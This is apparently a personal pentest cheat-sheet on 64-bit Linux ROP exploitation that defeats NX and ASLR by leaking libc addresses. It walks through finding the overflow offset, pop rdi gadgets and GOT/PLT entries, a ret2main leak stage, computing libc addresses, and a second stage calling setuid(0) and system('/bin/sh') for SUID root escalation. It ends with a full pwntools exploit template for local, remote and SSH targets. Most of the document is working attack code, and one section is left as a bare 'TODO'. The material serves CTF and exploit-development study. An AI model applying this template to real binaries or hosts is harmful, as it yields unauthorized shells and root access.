# Linux - ELF64 ROP leaks

### Overview

In 64-bit architecture, the `RIP` register is the instruction pointer register, equivalent to the 32-bit x86 architecture's EIP register.

### Preliminary checks

**NX and ASLR**

A ROP exploit should only be used under certain circumstances, as more easier and straightforward techniques could potentially be used to exploit a buffer overflow vulnerability.

A ROP is needed whenever the kernel on which the binary is executed is making use of `executable-space protection mechanisms`, preventing execution of certain memory regions in the stack by the processor. Indeed, if the mechanism is activated, any added shell code in the stack through the buffer overflow could not be directly executed. On Linux systems, the `NX` bit (no-execute bit) is responsible for the activation of this mechanism.

Another protection mechanism protecting against the exploitation of buffer overflow vulnerability is the `address space layout randomization (ASLR)`. In order to prevent reliable jumping to particular exploited function in memory, ASLR randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries. With `ASLR` activated it is thus not possible to jump at the memory address of a shell code placed in the stack or at a pre determined function, such as `system` in the `libc`.

The technique presented in this note should only be used whenever both `NX` and `ASLR` mechanisms are being used.

The `rabin2` utility can be used to retrieve the protection mechanisms of a binary:

```bash
rabin2 -I <BINARY>
arch     x86
bits     64
canary   false
class    ELF64
endian   little
nx       true
[...]
```

**Printing functions**

The exploitation technique presented in this note premised on the fact that addresses contained in the `libc` can be leaked. A function allowing a display on `stdout` is therefore necessary and must be present in the binary. The `puts` and `write` functions can be used to this effect for example.

The `objdump` Linux can be used to disassemble a binary and display the `plt` section, which contains references to external functions called by the binary.

```bash
objdump -D <BINARY> | grep "puts\|write"
```

At least one of the functions above must be present in order to conduct a ROP exploit based on `libc` addresses leaks.

### Calculate padding

The first step is to determine the needed number of bytes to overflow the injected buffer in order to overwrite the `rip` instruction pointer register.

The `pattern_create.rb` and `pattern_offset.rb` ruby scripts of the `Metasploit` framework can be used to calculate this offset.

If the binary is provided, `gdp` can be used to retrieve the value contained in the `rsp` registry after the crash. If the binary is only accessible remotely and can not be debugged, TODO

```bash
/opt/metasploit-framework/embedded/bin/ruby /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 5000
gdb-peda$ x/g $rsp
0xXXXXXXXXXXXX: <RETURNED_PATTERN>

/opt/metasploit-framework/embedded/bin/ruby /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_offset.rb -l 5000 -q <RETURNED_PATTERN>
[*] Exact match at offset <RIP_OFFSET>
```

### Leak libc address

Once the padding needed to overwrite `rip` is known, the next step is to leak the address of a `libc` function in the `GOT` table.

**Pass argument to the printing function**

On 64-bit architecture, the `rdi` register is used to pass the first argument to the called function. A gadget popping a value from the stack into the `rdi` register is thus needed to specify what should be printed as an argument to the printing function.

The `r2` utility can, among others, be used to find a `pop rdi` gadget:

```bash
r2 <BINARY>
[0xXXXXXXXX]> /R pop rdi
0x<ADR_POP_RDI>     5f  pop rdi
0xXXXXXXX           c3  ret
```

If the printing function takes more than one argument, gadgets to populate the following registers must be found:

* `%rsi` : 2nd argument ;
* `%rdx` : 3rd argument ;
* `%rcx` : 4th argument ;
* `%r8` : 5th argument ;
* `%r9` : 6th argument.

**Printing function PLT and GOT entries**

The entries in the `PLT` and `GOT` tables for the printing function must be retrieved, which can be done by disassembling the `plt` entry of the binary with the `objdump` Linux utility:

```bash
objdump -D <BINARY> | grep <PRINTING_FUNC>
<ADR_PLT_PRINTING>:	ff 25 32 0b 20 00    	jmpq   *0x200b32(%rip)        # <ADR_GOT_PRINTING> <PRINTING_FUNC@GLIBC_2.2.5>
```

**Return to main**

To continue the program execution flow after printing the `GOT` entry in `libc`, in order to avoid the re randomization of the address space, a return at the beginning of the program, the `main` function, is needed. It simply consist in adding the `main` function address in the ROP chain after calling the printing function. This mechanism is called `ret2main`.

The address of the `main` function in the `text` section can found using the `objdump` Linux utility:

```bash
objdump -D <BINARY> | grep main
<0000000000ADR_MAIN> <main>:
```

**Stage 1 payload**

Once the needed addresses have been retrieved, the following ROP chain can be constructed: `junk + pop_rdi + printing_func_got + printing_func_plt + main_plt`.

The following Python snippet can be used to generate the payload:

```python
junk = 'A' * <PADDING>

# Address example: 0x404028

# Python built-ins
pop_rdi = struct.pack('<Q', <ADR_POP_RDI>)
printing_func_plt = struct.pack('<Q', <ADR_PLT_PRINTING>)
printing_func_got = struct.pack('<Q', <ADR_GOT_PRINTING>)
main_plt = struct.pack('<Q', <ADR_MAIN>)

# pwntools
pop_rdi = p64(<ADR_POP_RDI>)
printing_func_plt = p64(<ADR_PLT_PRINTING>)
printing_func_got = p64(<ADR_GOT_PRINTING>)
main_plt = p64(<ADR_MAIN>)

payload = junk + pop_rdi + printing_func_got + printing_func_plt + main_plt
```

**Automated parsing of the leaked address**

The address of the printing function should be leaked and printed on `stdout` by the process. This value must be retrieved and stored in a variable for future use, as its needed to calculate the `libc` randomized offset.

`pwntools` can be used to automate the process:

```python
# If the binary display text before leaking the address
p.recvuntil('<STUFF>')
leaked_printing_func = p.recv()[:8].strip().ljust(8, '\x00')
leaked_printing_func = u64(leaked_printing_func)
```

The process can also be done using only Python built-ins, for example if the binary exploitation is made using a `subprocess`:

```python
p.stdin.flush()
out = read_until(p.stdout, '<STUFF>')
arr = out.split('\n')
leaked_print_func = arr[2].strip().ljust(8,'\x00')
leaked_print_func = struct.unpack('<Q', leaked_printing_func)[0]
```

### Commands execution

The leaked printing function address can be used to retrieve the actual address of the `libc` functions, such as `system` in order to call, for example, `/bin/sh`, and achieve code execution through the exploited binary.

**Find libc symbols offsets**

*Retrieve libc symbols offsets with access to the libc*

If an access to the `libc` loaded by the exploited binary is possible, the symbol offsets of the `libc` can easily be retrieved. Note that the `libc` is usually located in the `lib` folder: `/lib/x86_64-linux-gnu/libc.so.6`.

```bash
readelf -s <LIBC> | grep <PRINTING_FUNC>
422: <00000000000ADR_LIBC_PRINTING_FUNC>   512 FUNC    WEAK   DEFAULT   13 <PRINTING_FUNC>@@GLIBC_2.2.5

readelf -s <LIBC> | grep system
1403: <00000000000ADR_LIBC_SYSTEM>    45 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.2.5

# /bin/sh, /bin/bash, etc.
strings -a -t x <LIBC> | grep "/bin/sh"
<ADR_LIBC_SH> /bin/sh
```

*Retrieve libc symbols offsets without access to the libc*

If no direct access to the `libc` is possible in the exploitation context, the symbols offsets of the `libc` being used by the process can still be retrieved. Indeed, the `libc-database` can be used to determine the `libc` loaded given two entries of the `GOT` table. Search queries to the database can be make using `https://libc.blukat.me/`.

A second entry in the `GOT` table must be obtained:

```
objdump -D ropme | grep "GLIBC"
<ADR_PLT_FUNC>:	ff 25 22 0b 20 00    	jmpq   *0x200b22(%rip)        # <ADR_GOT_FUNC> <FUNC@GLIBC_2.2.5>
```

**Calculate randomized libc addresses**

Once the symbols offsets of the `libc` being used have been retrieved, the randomized `libc` addresses of the process can be calculated using the leaked printing function address:

```python
leaked_printing_func = 0x[...]

libc_printing_func = <ADR_LIBC_PRINTING_FUNC>
libc_system = <ADR_LIBC_SYSTEM>
libc_sh = <ADR_LIBC_SH>

libc_base = leaked_printing_func - libc_printing_func

# Python built-ins
sys = struct.pack('<Q', libc_base + libc_system)
sh = struct.pack('<Q', libc_base + libc_sh)

# pwntools
sys = p64(libc_base + libc_system)
sh = p64(libc_base + libc_sh)
```

**Specificities of SUID binaries**

In case of exploiting an `SUID` binary for local privilege escalation, the privileges granted by the `SUID` bit may be dropped. Notably `libc` includes security mitigations whenever calling `system()` with `/bin/sh` that drops the privileges if `euid` (process effective user identifier) != `uid` (user identifier). In case of an `SUID` binary, the `euid` corresponds to the `uid` of the binary owner.

A call to `setuid` can be used before calling `system("/bin/sh")` to change the `uid` of the process to the one of the binary owner, usually `0` in case of privilege escalation to `root`.

```bash
readelf -s <LIBC> | grep setuid
25: <00000000000ADR_LIBC_SETUID>   144 FUNC    WEAK   DEFAULT   13 setuid@@GLIBC_2.2.5
```

**Stage 2 payload**

Once the randomized addresses of `system` and `/bin/sh` in `libc` are obtained, the following ROP chain can be used to achieve code execution:

* with out `setuid`: `junk + pop_rdi + sh + sys`
* with `setuid`, for `SUID` binaries, `junk + pop_rdi + 0x<EUID> + setuid + pop_rdi + sh + sys`

```python
leaked_printing_func = 0x[...]

libc_printing_func = <ADR_LIBC_PRINTING_FUNC>
libc_system = <ADR_LIBC_SYSTEM>
libc_sh = <ADR_LIBC_SH>

libc_base = leaked_printing_func - libc_printing_func

# Python built-ins
sys = struct.pack('<Q', libc_base + libc_system)
sh = struct.pack('<Q', libc_base + libc_sh)

# pwntools
sys = p64(libc_base + libc_system)
sh = p64(libc_base + libc_sh)

# setuid
libc_setuid = <ADR_LIBC_SETUID>
# Python built-ins
setuid = struct.pack('<Q', libc_base + libc_setuid)
# pwntools
setuid = p64(libc_base + libc_setuid)

payload = junk
# setuid
payload += pop_rdi + p64(0x0) + setuid
payload += pop_rdi + sh + sys

# pwntools
p.sendline(payload)
time.sleep(1)
p.interactive()
```

### pwntools final code template

The following exploit code can be used as a template to exploit ROP buffer overflow vulnerability with `libc` address leaks:

```python
import sys
import time

from pwn import *

context(os = 'linux', arch = 'amd64')

BINARY = '<BINARY>'

OFFSET = 0

if (sys.argv[1] == 'local'):
  p = process(BINARY)
  context.log_level = 'DEBUG'

elif (sys.argv[1] == 'remote'):
  HOST = '<HOST>'
  PORT = 0 # <PORT>
  p = remote(HOST, PORT)

elif (sys.argv[1] == 'ssh'):
  HOST = '<HOST>'
  PORT = 0 # <PORT>
  USERNAME = '<USERNAME>'
  PASSWORD = '<PASSWORD>'
  s = ssh(host=HOST, port=PORT, user=USERNAME, password=PASSWORD)
  p = s.process(BINARY)

junk = OFFSET * 'A'

pop_rdi = p64(<ADR_POP_RDI>)
printing_func_plt = p64(<ADR_PLT_PRINTING>)
printing_func_got = p64(<ADR_GOT_PRINTING>)
main_plt = p64(<ADR_MAIN>)

payload = junk + pop_rdi + printing_func_got + printing_func_plt + main_plt

# If needed
# p.recvuntil(<STUFF>)

p.sendline(payload)

# If needed
# p.recvuntil(<STUFF>)

leaked_printing_func = p.recvline()[:-1].ljust(8, '\x00')
leaked_printing_func = u64(leaked_printing_func)
log.success('PRINTING_FUNC@GLIBC addr: 0x{:x}'.format(leaked_printing_func))

libc_printing_func = <ADR_LIBC_PRINTING_FUNC>
libc_system = <ADR_LIBC_SYSTEM>
libc_sh = <ADR_LIBC_SH>

libc_base = leaked_printing_func - libc_printing_func

sys = p64(libc_base + libc_system)
sh = p64(libc_base + libc_sh)

# If a setuid call is needed
libc_setuid = <ADR_LIBC_SETUID>
setuid = p64(libc_base + libc_setuid)

payload = junk
# If a setuid call is needed - here with an EUID = 0 (root)
payload += pop_rdi + p64(0x0) + setuid
payload += pop_rdi + sh + sys

# If needed
# p.recvuntil(<STUFF>)

p.sendline(payload)
time.sleep(1)
p.interactive()
```
